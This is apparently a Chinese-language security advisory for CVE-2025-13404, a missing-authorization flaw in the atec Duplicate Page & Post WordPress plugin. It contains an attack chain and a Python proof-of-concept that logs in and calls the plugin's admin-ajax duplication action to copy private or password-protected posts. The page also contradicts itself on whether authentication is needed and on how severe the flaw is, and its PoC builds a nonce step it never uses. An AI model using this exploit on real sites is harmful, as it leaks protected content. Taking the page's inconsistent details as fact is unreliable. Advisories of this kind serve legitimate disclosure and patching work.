CVE-2025-13404 WordPress atec Duplicate Page插件未授权复制漏洞

漏洞信息

漏洞编号

CVE-2025-13404

漏洞类型

缺少授权验证

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

atec Duplicate Page & Post WordPress Plugin

漏洞概述

CVE-2025-13404是WordPress插件atec Duplicate Page & Post中的一个高危安全漏洞。该插件用于在WordPress中快速复制页面和文章。然而，在1.2.20及之前的所有版本中，duplicate_post()函数缺少必要的授权验证机制。攻击者只需拥有Contributor（贡献者）级别或更高的账户权限，即可利用此漏洞复制任意文章，包括设置为私有或受密码保护的文章。这将导致敏感信息泄露，包括未公开的草稿、内部文档以及受保护内容。漏洞影响范围广泛，所有使用该插件的WordPress网站都面临风险。由于该插件被众多网站使用，建议管理员立即采取修复措施。

技术细节

该漏洞的根本原因在于duplicate_post()函数在执行复制操作前未进行权限检查。正常情况下，复制他人文章应需要编辑者(Editor)或管理员(Administrator)权限，但代码中仅验证了用户是否登录，而未检查用户是否有权限复制目标文章。攻击者利用方法：使用Contributor账户登录WordPress，通过REST API或admin-ajax.php构造请求，指定目标文章ID执行复制操作。由于WordPress的post复制功能会将原文章的所有内容、分类、标签、媒体附件等完整复制，攻击者可获取包括私密文章全文、受密码保护文章内容（复制后密码保护会丢失）、草稿版本等敏感信息。修复方案是在1.2.21版本中添加了current_user_can('edit_post', $post_id)权限验证。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress Contributor账户凭据

STEP 2

步骤2

使用账户登录WordPress后台

STEP 3

步骤3

识别目标文章（私密或受密码保护文章）的ID

STEP 4

步骤4

构造HTTP POST请求到admin-ajax.php，调用atec_wpdpp_duplicate_post动作

STEP 5

步骤5

插件未验证用户权限，直接执行duplicate_post()函数复制目标文章

STEP 6

步骤6

复制后的文章归攻击者所有，可直接访问完整内容，导致信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13404 PoC - atec Duplicate Page Plugin Unauthorized Post Duplication
# Authenticated attackers with Contributor+ access can duplicate arbitrary posts

import requests
import sys

target_url = input('Enter target URL: ')
username = input('Enter username: ')
password = input('Enter password: ')
target_post_id = input('Enter target post ID to duplicate: ')

session = requests.Session()

# Step 1: Login to WordPress
login_url = f'{target_url}/wp-login.php'
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

session.post(login_url, data=login_data)

# Step 2: Get nonce for the duplication action
nonce_url = f'{target_url}/wp-admin/admin-ajax.php?action=atec_wpdpp_duplicate_post&post_id={target_post_id}'

# Step 3: Exploit the vulnerability - duplicate the post without proper authorization
headers = {
    'X-Requested-With': 'XMLHttpRequest',
    'Referer': f'{target_url}/wp-admin/edit.php'
}

exploit_url = f'{target_url}/wp-admin/admin-ajax.php'
exploit_data = {
    'action': 'atec_wpdpp_duplicate_post',
    'post_id': target_post_id
}

response = session.post(exploit_url, data=exploit_data, headers=headers)

if response.status_code == 200:
    print('[+] Post duplicated successfully!')
    print(f'[+] Response: {response.text}')
else:
    print('[-] Exploitation failed')

影响范围

atec Duplicate Page & Post WordPress Plugin <= 1.2.20

防御指南

临时缓解措施

如果无法立即更新插件，可临时措施包括：1) 限制新用户注册为Contributor角色；2) 监控wp_posts表中异常的重复文章创建记录；3) 考虑暂时禁用atec Duplicate Page插件直到完成更新；4) 使用WordPress防火墙规则阻止异常的admin-ajax请求模式。